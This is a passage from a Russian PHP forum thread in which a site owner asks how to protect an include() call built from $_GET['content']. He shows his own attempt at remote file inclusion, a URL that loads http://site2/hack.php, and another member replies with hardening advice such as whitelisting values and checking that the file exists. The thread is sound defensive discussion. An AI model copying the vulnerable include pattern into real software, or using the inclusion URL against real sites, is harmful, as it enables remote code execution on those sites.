![]() |
Модераторы: skyboy, MoLeX, Aliance, ksnk |
![]() ![]() ![]() |
|
Redstuff |
|
|||
![]() Команда REDSTUFF ![]() ![]() Профиль Группа: Участник Сообщений: 497 Регистрация: 27.5.2006 Где: Санкт-Петербург Репутация: нет Всего: 1 |
include @$_GET['content'].".php"
ага, как это обойти? хотя токо что делал так: http://site1/index.php?content=send менял на: http://site1/index.php?content=http://site2/hack.php и ничего не выводило |
|||
|
||||
BobiKK |
|
|||
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 655 Регистрация: 1.12.2005 Где: Essen, Deutschlan d Репутация: 4 Всего: 16 |
1) Если ты вставлял именно такое значение в content, то инклюдился бы у тебя http://site2/hack.php.php
![]() 2) В php.ini возможно запрещено использование url в include, fopen и т.д. В любом случае, включи вывод всех ошибок и посмотри, на что интерпретатор ругается. Как избежать подключения нежелательного: 1) Не использовать в include переменные. Попытаться как-то это обходить 2) Проверять на допустимое значение. Скажем,
Это сообщение отредактировал(а) BobiKK - 25.7.2006, 23:00 |
|||
|
||||
Redstuff |
|
||||
![]() Команда REDSTUFF ![]() ![]() Профиль Группа: Участник Сообщений: 497 Регистрация: 27.5.2006 Где: Санкт-Петербург Репутация: нет Всего: 1 |
да, без расширения работает. Ну допустим переменные в некоторых страницах уберу, а как тогда обработать функцию? У меня есть пару страниц, где выводиться много картинок, и все это делает такая функция:
|
||||
|
|||||
BobiKK |
|
|||
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 655 Регистрация: 1.12.2005 Где: Essen, Deutschlan d Репутация: 4 Всего: 16 |
А где в этой фунцкии переменные из адресной строки?
|
|||
|
||||
Redstuff |
|
||||||
![]() Команда REDSTUFF ![]() ![]() Профиль Группа: Участник Сообщений: 497 Регистрация: 27.5.2006 Где: Санкт-Петербург Репутация: нет Всего: 1 |
Значит такое можно инклюдить?
Добавлено @ 23:55 Приведуы страниц: index.php
rule.php
file.php
Это сообщение отредактировал(а) Redstuff - 26.7.2006, 00:00 |
||||||
|
|||||||
BobiKK |
|
|||
Опытный ![]() ![]() Профиль Группа: Участник Сообщений: 655 Регистрация: 1.12.2005 Где: Essen, Deutschlan d Репутация: 4 Всего: 16 |
Ну прежде, чем инклюдить, проверить, если такой файл.
|
|||
|
||||
![]() ![]() ![]() |
Правила форума "PHP" | |
|
Новичкам:
Важно:
Внимание:
Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers. |
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей) | |
0 Пользователей: | |
« Предыдущая тема | PHP: Общие вопросы | Следующая тема » |
|
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности Powered by Invision Power Board(R) 1.3 © 2003 IPS, Inc. |